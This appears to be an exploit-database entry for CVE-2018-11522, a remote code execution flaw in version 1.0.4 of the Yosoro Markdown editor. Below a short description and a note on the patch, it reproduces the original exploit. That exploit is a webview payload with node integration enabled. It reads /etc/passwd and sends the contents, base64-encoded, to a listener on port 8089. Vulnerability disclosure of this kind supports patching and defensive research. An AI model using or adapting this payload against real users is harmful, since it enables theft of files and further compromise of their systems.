Yosoro 1.0.4 - Remote Code Execution

vendor:

Yosoro

by:

Carlo Pelliccioni

6.1

CVSS

MEDIUM

Remote Code Execution

CWE

Product Name: Yosoro

Affected Version From: 1.0.4

Affected Version To: 1.0.4

Patch Exists: YES

Related CWE: CVE-2018-11522

CPE: a:yosoro:yosoro:1.0.4

Metasploit: N/A

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=124937

Platforms Tested: MacOS 10.13.4

2018

Yosoro 1.0.4 – Remote Code Execution

A vulnerability in Yosoro 1.0.4 allows an attacker to execute arbitrary code on the target system. The vulnerability exists due to insufficient input validation in the webview component. An attacker can exploit this vulnerability by sending a specially crafted payload to the webview component. The payload contains a malicious JavaScript code that reads the /etc/passwd file and sends it to a remote server. The attacker can then use the information to gain access to the target system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Yosoro.

Source

Exploit-DB raw data:

# Exploit title: Yosoro 1.0.4 - Remote Code Execution
# Date: 2018-05-29
# Exploit Author: Carlo Pelliccioni
# Vendor homepage: https://yosoro.coolecho.net/
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
# Version: 1.0.4
# Tested on: MacOS 10.13.4
# CVE: CVE-2018-11522
#  _  _            _    _    _             ___                      _  _         
# | || | __ _  __ | |__| |_ (_)__ __ ___  / __| ___  __  _  _  _ _ (_)| |_  _  _ 
# | __ |/ _` |/ _|| / /|  _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| ||  _|| || |
# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_|  |_| \__| \_, |

# Remote Code Execution (CVE-2018-11522)
# Payload: 

<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>